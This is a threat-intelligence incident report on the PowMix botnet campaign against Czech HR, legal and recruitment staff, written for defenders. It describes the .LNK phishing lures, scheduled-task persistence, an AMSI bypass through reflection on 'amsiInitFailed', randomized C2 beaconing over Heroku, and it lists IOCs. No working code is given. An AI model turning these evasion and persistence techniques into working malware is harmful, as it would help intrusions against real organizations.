Full Report
Cisco Talos discovered an ongoing malicious campaign, operating since at least December 2025, affecting a broader workforce in the Czech Republic with a previously undocumented botnet we call “PowMix.”
Analysis Summary
# Incident Report: PowMix Botnet Campaign Targeting Czech Republic
## Executive Summary
Since at least December 2025, a previously undocumented PowerShell-based botnet dubbed "PowMix" has been targeting the workforce in the Czech Republic. The campaign employs sophisticated evasion techniques, including randomized C2 beaconing and in-memory execution, to deliver malicious payloads to HR, legal, and recruitment professionals. The threat actor leverages compliance-themed lures related to the Czech Data Protection Act to compromise diverse sectors including IT, finance, and logistics.
## Incident Details
- **Discovery Date:** April 16, 2026 (Talos Public Disclosure)
- **Incident Date:** Active since at least December 2025 (Ongoing)
- **Affected Organization:** Broader Czech workforce; impersonation of EDEKA brand
- **Sector:** Cross-sector (HR, Legal, Recruitment, IT, Finance, Logistics)
- **Geography:** Czech Republic
## Timeline of Events
### Initial Access
- **Date/Time:** December 2025 – Present
- **Vector:** Phishing/Social Engineering
- **Details:** Victims receive a ZIP archive containing a malicious Windows Shortcut (.LNK) file. The lures utilize thematic content regarding compensation data and the Czech Data Protection Act to entice users into opening the file.
### Lateral Movement
- **Details:** Specific lateral movement techniques were not detailed in the report, as the focus remained on the initial infection vector and the primary botnet capabilities.
### Data Exfiltration/Impact
- **Details:** The PowMix botnet transmits system metadata (Bot ID, OS info, Computer Name) to the C2. While the final payload was unobserved, the botnet possesses the capability to execute arbitrary PowerShell commands and update C2 infrastructure dynamically.
### Detection & Response
- **Discovery:** Detected by Cisco Talos through telemetry and analysis of localized lure documents.
- **Response Actions:** Release of ClamAV signatures and Snort rules; public disclosure of IOCs to assist defenders.
## Attack Methodology
- **Initial Access:** Phishing via ZIP archives containing malicious .LNK files.
- **Persistence:** Creation of Windows Scheduled Tasks to ensure execution across reboots.
- **Privilege Escalation:** Not explicitly stated; relies on user-level execution for initial foothold.
- **Defense Evasion:** Bypasses AMSI using reflection to manipulate `amsiInitFailed`; uses randomized C2 beaconing intervals; executes payloads directly in memory (Heuristic-bypass).
- **Credential Access:** Not specified (potential for follow-on payloads).
- **Discovery:** Collects Bot ID (CRC32 based), computer name, and OS architecture.
- **Lateral Movement:** Not specified.
- **Collection:** Gathers system metadata for C2 registration.
- **Exfiltration:** Heartbeat data and system identifiers embedded into C2 URL paths mimicking REST APIs.
- **Impact:** System compromise, potential for data theft or further malware deployment.
## Impact Assessment
- **Financial:** Unknown; potential for significant loss if used for ransomware or business email compromise.
- **Data Breach:** Metadata and system information leaked; risk of sensitive corporate data theft via arbitrary command execution.
- **Operational:** Disruption through unauthorized persistence and potential for subsequent payload delivery.
- **Reputational:** Impersonation of legitimate brands (EDEKA) and regulatory frameworks may damage trust in compliance-related communications.
## Indicators of Compromise
- **Network Indicators:**
- `[domain].herokuapp[.]com` (Abused for C2 infrastructure)
- URLs mimicking REST APIs with embedded encrypted data.
- **File Indicators:**
- Lnk.Trojan.PowMix-10059735-0
- Txt.Trojan.PowMix-10059742-0
- **Behavioral Indicators:**
- PowerShell script executing AMSI bypass via `amsiInitFailed`.
- Random intervals between network beacons to circumvent signature detection.
- Creation of persistence via `Unregister-ScheduledTask` and `Set-Content` manipulations.
## Response Actions
- **Containment:** Organizations advised to block identified Heroku-based C2 domains.
- **Eradication:** Deployment of specific Snort (SID: 66118) and ClamAV signatures to identify and remove PowMix components.
- **Recovery:** Restoration of compromised systems; removal of rogue Scheduled Tasks and "ProgramData" staging directories.
## Lessons Learned
- **Thematic Sophistication:** Threat actors are successfully leveraging localized legislation (Czech Data Protection Act) to increase the success rate of social engineering.
- **Infrastructure Abuse:** The continued use of legitimate cloud platforms like Heroku for C2 operations complicates IP-based blocking.
- **Evasion Evolution:** The move from persistent connections to randomized heartbeat intervals effectively bypasses many traditional network security signatures.
## Recommendations
- **Technical:** Implement EDR policies to block PowerShell from loading reflection-based AMSI bypasses and monitor for unusual scheduled task creations in `ProgramData`.
- **Policy:** Restrict the execution of .LNK files from downloaded ZIP archives.
- **Training:** Conduct localized security awareness training focusing on HR and Legal departments regarding document legitimacy and legislative lures.